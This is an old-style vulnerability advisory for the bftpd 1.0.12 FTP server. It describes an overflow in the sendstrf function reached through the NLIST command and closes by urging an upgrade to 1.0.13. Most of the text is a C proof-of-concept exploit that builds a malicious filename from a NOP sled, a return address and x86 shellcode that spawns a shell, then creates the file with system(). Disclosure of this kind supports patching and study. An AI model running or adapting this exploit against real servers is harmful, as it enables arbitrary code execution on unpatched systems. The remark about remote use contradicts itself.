COMMAND
bftpd
SYSTEMS AFFECTED
bftpd 1.0.12
PROBLEM
'asynchro' found following. There is a malformed vsprintf in
bftpd 1.0.12 in function sendstrf:
int sendstrf(int s, char *format, ...) {
....
vsprintf(buffer, format, val);
when the function is called from NLIST command:
else
foo = 1;
sendstrf(s, entry->d_name);
}
This can be used to overflow the buffer of the vsprintf and
execute arbitrary code. Guess is that it can be normally used
for a remote attack because bftpd removes all non-printable
characters from input strings and so it is not possible to
remotely put a shellcode in a filename. A demostrative code is
below.
/*
Creates a filname to exploit the bug in bftpd 1.0.12
Create the file, cwd in the shell directory and nlist the file directory
(sh is executed in the working dir because it is not possible to insert a / in
the filename)
hints by |CyRaX| & Cthulhu
coded by asynchro
www.pkcrew.org
*/
#include <stdlib.h>
#include <unistd.h>
#define BUFSIZE 512
#define NOP 124
main()
{
int i;
char *buff;
char nop=0x90;
char addr[]="\xd4\xf9\xff\xbf";
char command[]="touch %.260x";
char shellcode[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xffsh";
buff=(char *) malloc(BUFSIZE);
memset(buff,0x0,BUFSIZE);
memcpy(buff,command,sizeof(command));
strncat(buff,addr,4);
strncat(buff,addr,4);
for(i=0; i < NOP ;i++)
{
strncat(buff,&nop,1);
}
strncat(buff,shellcode,strlen(shellcode));
system(buff);
}
SOLUTION
There were a lot of bugs in version 1.0.12. Most of them have
already been fixed about half a month ago, but there was no new
version at that time. Now that 1.0.13 has been released, everyone
is urged to upgrade.